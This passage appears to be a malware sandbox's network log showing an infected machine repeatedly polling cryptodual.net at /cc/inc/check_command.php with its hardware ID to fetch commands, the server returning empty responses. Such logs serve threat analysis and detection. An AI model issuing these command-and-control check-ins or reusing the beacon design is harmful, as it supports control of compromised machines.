                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3114923d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:14.373823881 CET1297OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:14.460578918 CET1298INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770363f4b0000d6d95293e000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UwW1Wa9DPHYgibxE4gaRyRDY576ouUaMyvCLl%2BzNe0lF2hsYCXFSfeiMoZFT2jmRWhkdgjf4n23qqSRq8m2TeAV1XRPhAFiIDsy%2FPlqyiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3121ab6d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:14.464342117 CET1298OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:14.558474064 CET1299INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:14 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770363fa50000d6d961870000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9al1H%2F3Mk81HqKrYnvduAki3GrJdU0tTP%2BSBdPJkMW7H7qdD06uoa1YqiuKfXcgZUSFMB2b2wFkNj11g%2FgzXGtQUvi2Jx0UagfKuh9K0sQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f312abfbd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:20.188842058 CET1299OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:20.510296106 CET1300INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703656020000d6d966a4e000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Ya%2FEV7MXFKyKmhj5OY55zHft4syV%2Fs7YU0nwGEytESTOWTmWOKCCTS13mIFnC9cHIEqQjlU6a%2FuFHx9%2FLjquYIF%2BnVBF7FTlmTL1k17fQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3366f88d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:20.525207996 CET1300OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:20.602121115 CET1301INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703657530000d6d96408d000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LGmdpO1R5ZCPkBZZ6eLPFDpXl00nIkfQf0ZXWcWd6kW2BTDgnQ7hDPPDI8TsBo2zU9nIKcPF81BYNOi0zRL%2BGVrB3W9KK44bd4pm3kNCCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3388bb1d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:20.604695082 CET1301OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:20.693628073 CET1302INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703657a20000d6d97185f000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=r0boyIAtNi1YStAI%2BaGhmPNdvrC3JoULl3AA3%2FNqiSj5CQKHuvyy2hf2MqIY4CZrdLpHa1MuhYy2WwDBRmm5WsU6A0H7Ah3K5Aas7YCrng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3390cb7d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:20.695406914 CET1302OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:20.820446014 CET1303INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703657fc0000d6d9fb3ae000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UtIv0OIg1BQlpv4tDY8FTzrDTyf9rriGqIt4w6ufUgZwYYQINj5f7goEh3a4pYunghbTL08cSJ0cCC64kju0pl4%2Ff%2Fjpd9OHofaZNnp70Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3399ddfd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:25.821773052 CET1303OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:25.934205055 CET1304INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770366c150000d6d920a8f000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TZl3Hpj%2F3VRrWgrynTPfHlsuU0Et2dEYHyvxsq3em%2FtLiEH7YXtE8sJgleR8TB6H1tKbdEeBhf8JX0TM55a6wLi6dEfRkdoPvFNsre4whg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f359a930d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:25.936414003 CET1304OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:26.041019917 CET1305INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770366c760000d6d94639f000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vFirehTi980MOXcrj54sMiQUSgTIILS40ZNBZeZZOMKwHIjJjnIUDHwC5pjMl%2Fut5%2BgqJOjgFGDeFgxvBh87rSmXyvDGz%2FPj2qfVndJ73A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f35a5a9ad6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:26.045707941 CET1305OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:26.126383066 CET1306INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770366ce30000d6d940906000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=KkW%2Bs%2BWmKfNpgOYQeJITpb1CYpCQYF6DTkKnOy9R3f8VzENtLJhnAk7aGCK0sLIx%2BfG30jQS6BtXO5kGJocOJKktm2CYWIhJepH3lhz4MQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f35b0befd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:26.128197908 CET1306OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:26.206381083 CET1307INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0770366d360000d6d952922000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=AxB0h4Wl3qGRZ%2B1x8WK87kIH74dg%2Bg%2FPljKgcitOSBe80y0zN42JM%2FDAMmZX3P0ghZnLaGa7VoOy5K%2BWmZTOvzCZIJckExclbcx0qr%2FHPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f35b8d0ed6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:31.236563921 CET1307OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:31.325584888 CET1308INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036812a0000d6d92c015000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2ErR3Fha3RdD3w08NgHVhHtjrWsXkZ71V8Ni7%2BGPV%2BB%2FOBw%2F%2FlvCh6gHtNXeCASvYhWAHwR516wCbPsQW9XIl%2B8VvOCYDX%2BtPUqWKrA31w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f37b79a3d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:31.327785969 CET1308OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:31.413295031 CET1309INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036818d0000d6d94ebe9000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xHEMt%2BuyoC3h5CSHTKIPyt3kNvebq%2BOYb3VCUhsaqj5J61FvVA24%2F2%2FGHl5y6%2FlxVsp6YfPH6PT9gULIKRdG8ujUzLkSZgC19%2BEdK2KM2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f37c1aeed6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:31.416656971 CET1310OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:31.495723963 CET1310INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703681e00000d6d91fbd0000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=qymNSL7FDtajxjhOSnYT6rK1UBBK8tpcTBkmmKv8ehkdBCm4a4xQiHlI8an0l%2FnCZtw412jGnHY39I4zmPwQZE1KTNfoWZMZkmwwxWoEBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f37c9c16d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:31.497657061 CET1311OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:31.583204031 CET1311INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703682300000d6d9570b2000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jC%2B6DbtuQuNwfOjj839voNVku7EXa%2BBGejmf%2BRv%2FCWj0V1FRE6XM%2BDR7cFZ73J9IotEsjWPtxOCmiB6BIjUlHq3NcJolqSw%2Bw9uowZWN3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f37d1d31d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:36.587044954 CET1312OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:36.695008993 CET1312INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703696100000d6d9209ee000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QkTu5aGWl3htBmY5dznxL2X49FCJQ%2FMJPuw3y7THi9XAxd4%2BlmFjcnlB8Z7ABYPvvwP4KAR3cvkdg4YPu8U0s4649c%2F4upulUT%2BT9tYzMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f39ce8e3d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:36.697040081 CET1313OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:36.781266928 CET1313INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036967e0000d6d90a060000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DP4oGINFSFhDGPoz3FKtEbbtY8eLkxfdLKnBOYabmnbO5of8D7qGmB482TD3jawsgwJ4mzfB2wb9v%2FnhkScey2Y3tc1mHh0pcnxxBmDrCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f39d9a4bd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:36.783519030 CET1314OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:36.861104965 CET1314INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703696d50000d6d9fb0df000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=01TYgM8r3MiWEfc9mESGpqjmle5en4Xzjmdo3WHgxGJahIiFEb%2B5VYSWxJpjMHaLq5HqF%2FfXp3faWGC0FXykluAcT4gKT%2B0pdLvHQQMyQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f39e2b68d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:36.862987041 CET1315OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:36.945493937 CET1315INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 07703697240000d6d94e9b4000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=R86qVaGqSKEptF64FOf7iaJ7EBsjD7kAiRqhy43JTyvF50JYV74uxH2%2F1etzLPZ57LeK38KVbqWfNhR4j6%2FXss%2FCcDHvBv9IVlyEPSGBwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f39eac69d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:41.952533960 CET1316OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:42.027641058 CET1316INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036ab060000d6d94eb43000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ejMbvBQvbxwGMLprk%2F6DmOlpIjXrfhAmaob%2BDnIYWY%2FuXKgflsIi7fT%2BBC3FbVBLZxgymJ2eMZK34%2BfpNmGQ84SqanM8rPHeH2turny8QQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3be6883d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:42.029711962 CET1317OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:42.116765976 CET1317INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036ab530000d6d957040000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=nMm0kHRn%2B2iTEWiE1m1cbJ8oFC7M5fVNJ4614LtYheFNYM9tc8ew4jN%2FWJCA%2BBLcSv8n00G54nvbWw6MfYbwpND4mo6xndWF7j5oSSiIjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3bee9acd6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:42.119549990 CET1318OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:42.201600075 CET1319INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 077036abae0000d6d96195e000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UuGk3I6SpQrIM8N6SKJep9ZC7EGkgHwsE1WJPLRO7pJLZ7LRBm6q259i2DFPYRzCmrzGAmUMjZ8aOI4gpZ35cPmYaG%2BvMkLATRrj9uJOiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 60c6f3bf7ac6d6d9-FRA
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0
                                                                Jan 4, 2021 19:16:42.203073978 CET1319OUTGET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1
                                                                User-Agent: MyAgent
                                                                Host: cryptodual.net
                                                                Cache-Control: no-cache
                                                                Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
                                                                Jan 4, 2021 19:16:42.283946991 CET1320INHTTP/1.1 200 OK
                                                                Date: Mon, 04 Jan 2021 18:16:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.0.33
                                                                X-Turbo-Charged-By: LiteSpeed
